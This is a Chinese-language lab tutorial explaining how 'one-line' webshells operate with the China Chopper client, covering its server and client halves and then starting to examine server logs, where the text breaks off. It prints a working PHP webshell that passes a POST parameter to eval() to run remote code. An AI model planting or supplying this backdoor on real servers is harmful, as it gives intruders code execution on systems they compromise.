了解一句话脚本的工作原理
一句话脚本的工作原理:
一句话恶意脚本分析服务端与客户端。(此处以asp脚本语言简述原理)
一句话恶意脚本服务端就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中pass可以自己修改
一句话恶意脚本客户端(即为中国菜刀主程序)用来向服务端提交控制数据的,提交的数据通过服务端构成完整的asp功能语句并执行.
我们尝试抓取http日志来剖析菜刀技术原理:
在上述试验中,我们最开始连接的hack.php的代码如下:1
2
3<?php
eval ($_POST['pass']);
?>
在PHP的代码中:eva() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。
在我们通过中国菜刀进行文件管理的时候,系统在做什么呢?
在这里我们需要查看系统的日志进行查找答案(1) 查看系统日志
(2)重新使用菜刀的文件管理功能抓取日志
我们在中国菜刀中重新使用文件管理的功能,其后服务器端产生了日志信息。
服务器端产生了如下日志信息(以下数据为服务器端日志数据,在实验环境中无法查看,仅作理论参考):1172.16.11.2 - -